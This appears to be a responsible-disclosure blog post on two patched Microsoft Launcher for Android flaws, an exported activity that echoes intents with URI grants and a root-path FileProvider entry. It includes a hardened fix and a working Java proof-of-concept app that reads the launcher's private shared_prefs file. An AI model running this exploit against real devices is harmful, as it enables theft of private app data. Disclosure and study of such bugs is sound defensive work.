
Misconfigured Microsoft Content Provider

Insecure content providers in com.microsoft.launcher

While conducting security research focused on Android application userland bugs, I uncovered an interesting vulnerability in the com.microsoft.launcher.allapps.AllAppsShortcutActivity activity of the com.microsoft.launcher application. Specifically, the vulnerability arises from the absence of input filtering in the onMAMCreate() function. Here is the relevant vulnerable code snippet (decompiled):

public void onMAMCreate(Bundle bundle0) {
    super.onMAMCreate(bundle0);
    Intent intent0 = this.getIntent();
    if(intent0 != null && intent0.getAction() != null && (intent0.getAction().equals("android.intent.action.CREATE_SHORTCUT"))) {
        intent0.putExtra("android.intent.extra.shortcut.INTENT", new Intent(this.getApplicationContext(), AllAppsShortcutActivity.class));
        intent0.putExtra("android.intent.extra.shortcut.NAME", this.getResources().getString(0x7F110225));
        intent0.putExtra("android.intent.extra.shortcut.ICON", ViewUtils.f(this, new c(i.f().e)));
        this.setResult(-1, intent0);
        this.finish();
    }
}

This activity is exported, making it accessible to third-party applications. Consequently, a third-party app can send it an intent, which is retrieved via this.getIntent() and assigned to the intent0 variable. If the action of intent0 matches android.intent.action.CREATE_SHORTCUT, execution proceeds to setResult(-1, intent0).

This is a significant security vulnerability because the incoming intent is handed straight back to the caller via setResult() without any filtering. The result intent therefore carries whatever data URI and grant flags the caller attached, and because the system applies those URI grants with the launcher's own permissions, a malicious application can use the exported activity to obtain access it was never meant to have. The intent is processed within the context of the com.microsoft.launcher application, and the result is returned to the malicious application.
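The fix a defender would want here is to never echo the caller's intent back through setResult(). The following hardened handler is an added example written for this post, not Microsoft's code; it is built on a plain AppCompatActivity rather than the Intune MAM base class the original uses, and the package name and the R.string/R.mipmap resource ids are assumptions.

```java
// Added example (not from the original app): a hardened version of the
// shortcut handler shown above. The caller's Intent is only inspected; the
// result handed back is a freshly built Intent, so any data URI, flags or
// extras the caller attached are never reflected back to it.
package com.example.hardened; // hypothetical package

import android.content.Intent;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;

public class AllAppsShortcutActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);

        Intent incoming = getIntent();
        if (incoming == null
                || !Intent.ACTION_CREATE_SHORTCUT.equals(incoming.getAction())) {
            // Anything other than a shortcut request gets no result at all.
            setResult(RESULT_CANCELED);
            finish();
            return;
        }

        // Explicit component, no data URI, no grant flags: the shortcut
        // target is fully determined by this app, not by the caller.
        Intent target = new Intent(getApplicationContext(), AllAppsShortcutActivity.class);
        target.setAction(Intent.ACTION_MAIN);

        // The result contains only the extras a shortcut needs; nothing from
        // `incoming` (its data URI, flags or extras) is copied across.
        Intent result = new Intent();
        result.putExtra(Intent.EXTRA_SHORTCUT_INTENT, target);
        result.putExtra(Intent.EXTRA_SHORTCUT_NAME, getString(R.string.all_apps)); // assumed id
        result.putExtra(Intent.EXTRA_SHORTCUT_ICON_RESOURCE,
                Intent.ShortcutIconResource.fromContext(this, R.mipmap.ic_launcher)); // assumed id

        setResult(RESULT_OK, result);
        finish();
    }
}
```

With this change a caller that attaches a content:// URI and FLAG_GRANT_READ_URI_PERMISSION to its request gets back an intent that carries neither, so no URI grant is made on its behalf.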

Another vulnerability was identified in the content provider's paths XML of com.microsoft.launcher:

<?xml version="1.0" encoding="UTF-8"?>
<paths xmlns:android="http://schemas.android.com/apk/res/android">
  <root-path name="root_path" path="."/>
  <external-path name="external_storage_root" path="."/>
  <external-files-path name="profile" path="."/>
  <files-path name="note_root" path="./Arrow/Notes/"/>
  <files-path name="data_files" path="data/"/>
</paths>

The issue is that the paths XML defines a root-path element with path=".", which maps the provider onto the root of the device filesystem and so allows any file on the device to be read through it. In practice the reach is bounded by the launcher's own UID: the provider can only serve files its process can read, which includes the launcher's private data such as its shared_prefs, the target of the proof of concept below. The fix is to drop the root-path entry and scope the remaining files-path entries to the specific subdirectories that actually need to be shared.

POC Requirements.

Proof of Concept

package com.example.microsofthunts;

import androidx.appcompat.app.AppCompatActivity;

import android.content.Intent;
import android.database.Cursor;
import android.net.Uri;
import android.os.Bundle;
import android.util.Log;

import org.apache.commons.io.IOUtils;

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        // Request aimed at the exported shortcut activity discussed above.
        Intent exploit = new Intent("android.intent.action.CREATE_SHORTCUT");
        exploit.setClassName("com.microsoft.launcher", "com.microsoft.launcher.allapps.AllAppsShortcutActivity");
        exploit.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);

        // content:// URI served by the launcher's root_path provider entry.
        exploit.setData(Uri.parse("content://com.microsoft.launcher.provider/root_path/data/data/com.microsoft.launcher/shared_prefs/com.microsoft.launcher_RemoteConfiguration.xml"));

        startActivityForResult(exploit, 1);
    }

    @Override
    protected void onActivityResult(int requestCode, int resultCode, Intent data) {
        super.onActivityResult(requestCode, resultCode, data);

        try {
            // The result intent is the same one sent above, echoed back by the launcher.
            Log.d("Dumping Files: ", IOUtils.toString(getContentResolver().openInputStream(data.getData())));
        } catch (Throwable th) {
            throw new RuntimeException(th);
        }
    }

    // Helper for logging the rows returned by a content provider query.
    public void dump(Uri uri) {
        Cursor cursor = getContentResolver().query(uri, null, null, null, null);
        if (cursor == null) {
            return;
        }
        try {
            if (cursor.moveToFirst()) {
                do {
                    StringBuilder sb = new StringBuilder();
                    for (int i = 0; i < cursor.getColumnCount(); i++) {
                        if (sb.length() > 0) {
                            sb.append(", ");
                        }
                        sb.append(cursor.getColumnName(i) + " = " + cursor.getString(i));
                    }
                    Log.d("Rezk", sb.toString());
                } while (cursor.moveToNext());
            }
        } finally {
            cursor.close();
        }
    }

}

Disclosure Timeline

| Action | Date |
|---|---|
| Reported vulnerabilities to Microsoft and provided Proof of Concept (POC) | 2nd June, 2022 |
| Submitted an updated report with additional information | 4th June, 2022 |
| The report was moved into the Review/Repro stage | 6th June, 2022 |
| The report was moved into the Development stage | 19th June, 2022 |
| The case was updated, indicating low severity | 20th June, 2022 |
| A patch was issued; however, no bounty was paid because the bug is only exploitable on Android 9, not on 10/11 | 23rd June, 2022 |
| Full disclosure of the issue | 17th Oct, 2023 |

This concludes my additional 2023 blog post. K Bye.
This post is licensed under CC BY 4.0 by the author.